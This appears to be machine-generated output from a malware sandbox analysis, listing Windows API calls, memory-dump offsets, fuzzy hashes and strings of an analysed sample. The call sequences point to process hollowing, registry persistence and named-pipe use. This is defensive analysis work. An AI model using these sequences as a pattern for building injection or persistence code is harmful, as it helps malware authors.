    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
